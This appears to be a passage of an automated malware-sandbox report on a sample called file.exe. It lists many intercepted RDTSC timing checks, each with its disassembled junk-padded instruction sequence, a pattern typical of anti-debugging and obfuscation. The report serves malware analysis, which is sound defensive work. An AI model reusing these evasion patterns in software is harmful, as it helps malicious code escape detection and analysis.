              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D12D78 second address: D12D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push ecx 0x0000000d jp 00007F055C7C833Dh 0x00000013 jmp 00007F055C7C8331h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D13299 second address: D132C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637C2h 0x00000007 jmp 00007F055D0637C1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e je 00007F055D0637C2h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15D30 second address: D15D6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C8330h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F055C7C8335h 0x0000000f pushad 0x00000010 jmp 00007F055C7C8330h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D161C9 second address: D161CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D161CD second address: D161EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F055C7C8339h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1BB47 second address: D1BB6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F055D0637C5h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f jnc 00007F055D0637B6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C0C6 second address: D1C0E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jmp 00007F055C7C8334h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C0E1 second address: D1C0E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C3FB second address: D1C401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D2C8 second address: D1D2CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D2CC second address: D1D2E6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F055C7C832Eh 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D2E6 second address: D1D2F6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jne 00007F055D0637B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D2F6 second address: D1D2FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D2FA second address: D1D2FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D2FE second address: D1D30B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 push esi 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22AF8 second address: D22B07 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F055D0637B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22B07 second address: D22B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F055C7C8337h 0x0000000c jmp 00007F055C7C832Dh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22B32 second address: D22B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2668D second address: D26691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D259F5 second address: D259FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25B2C second address: D25B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 js 00007F055C7C8338h 0x0000000d jmp 00007F055C7C8332h 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 jne 00007F055C7C8326h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25CC2 second address: D25D01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 jmp 00007F055D0637BCh 0x00000017 jne 00007F055D0637B6h 0x0000001d jmp 00007F055D0637C6h 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25D01 second address: D25D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25D05 second address: D25D15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25E93 second address: D25E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26123 second address: D26127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26127 second address: D26141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F055C7C832Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F055C7C8326h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26141 second address: D26164 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F055D0637B6h 0x00000008 jmp 00007F055D0637C9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2F781 second address: D2F7BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F055C7C8339h 0x0000000e jmp 00007F055C7C8338h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D9EA second address: D2D9F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2D9F0 second address: D2DA03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F055C7C832Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2DE4D second address: D2DE5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F055D0637BAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D2DE5D second address: D2DE69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnp 00007F055C7C8326h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D2E68B second address: D2E695 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F055D0637B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D2EDFC second address: D2EE53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C8331h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F055C7C832Eh 0x00000010 push esi 0x00000011 pop esi 0x00000012 jo 00007F055C7C8326h 0x00000018 jmp 00007F055C7C8339h 0x0000001d jmp 00007F055C7C832Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F055C7C832Ah 0x00000029 push edi 0x0000002a pop edi 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D2D465 second address: D2D469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D2D469 second address: D2D46D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D2D46D second address: D2D494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F055D0637C9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D350E2 second address: D350E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D350E6 second address: D350EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D350EA second address: D35103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F055C7C8326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jmp 00007F055C7C832Bh 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D3524D second address: D35266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F055D0637C5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D35266 second address: D3526A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D3526A second address: D35278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D35278 second address: D3527C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D38FB3 second address: D38FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F055D0637C3h 0x00000009 jng 00007F055D0637B6h 0x0000000f popad 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 jmp 00007F055D0637C0h 0x00000018 push eax 0x00000019 pop eax 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D38FE7 second address: D39017 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007F055C7C8333h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F055C7C832Fh 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D46834 second address: D4683D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D493F8 second address: D4941D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F055C7C832Ah 0x0000000f jmp 00007F055C7C832Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D589BC second address: D589C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D589C6 second address: D589CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5BB21 second address: D5BB27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5BB27 second address: D5BB2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5FEBF second address: D5FEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F055D0637B6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F055D0637C5h 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5FEEB second address: D5FEEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D601B8 second address: D601C5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D601C5 second address: D601CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D601CB second address: D601F1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F055D0637B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F055D0637C8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D601F1 second address: D601F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D601F5 second address: D60201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F055D0637B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D60201 second address: D60209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D60209 second address: D6020D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D65294 second address: D6529A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D6529A second address: D652A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D652A0 second address: D652D0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F055C7C8326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F055C7C8339h 0x00000011 jmp 00007F055C7C832Bh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D652D0 second address: D652D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D66DB4 second address: D66DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D66DB8 second address: D66DBE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D6A13E second address: D6A14A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D6C60F second address: D6C615 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D6C615 second address: D6C61A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D6C61A second address: D6C620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D7977A second address: D7977E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D7977E second address: D79782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D79782 second address: D797A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F055C7C8336h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D7BBF6 second address: D7BBFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D7BBFA second address: D7BC46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F055C7C8334h 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F055C7C8334h 0x00000016 jmp 00007F055C7C8338h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D7BC46 second address: D7BC4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D7BC4A second address: D7BC65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F055C7C8328h 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007F055C7C8326h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D7BC65 second address: D7BC6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D73B77 second address: D73B8D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F055C7C832Ch 0x00000008 jns 00007F055C7C8326h 0x0000000e ja 00007F055C7C832Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D8884E second address: D88867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F055D0637C0h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D88867 second address: D8886B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D8886B second address: D888AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jne 00007F055D0637CFh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 jmp 00007F055D0637C9h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D888AF second address: D888D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C832Fh 0x00000007 jne 00007F055C7C8326h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F055C7C8326h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D8B690 second address: D8B696 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D8B696 second address: D8B6C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C832Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F055C7C8339h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D9FA43 second address: D9FA59 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F055D0637B6h 0x00000008 jnl 00007F055D0637B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D9FA59 second address: D9FA5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D9FEA2 second address: D9FEA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D9FEA6 second address: D9FEAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DA0023 second address: DA002E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DA0444 second address: DA0450 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F055C7C8326h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DA0450 second address: DA0483 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F055D0637C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jmp 00007F055D0637BEh 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 push ebx 0x00000016 push eax 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DA0483 second address: DA0488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DA0488 second address: DA048E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DA048E second address: DA0494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DA0494 second address: DA0498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DA0498 second address: DA04C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C832Dh 0x00000007 jno 00007F055C7C8326h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007F055C7C8337h 0x00000015 jmp 00007F055C7C832Bh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
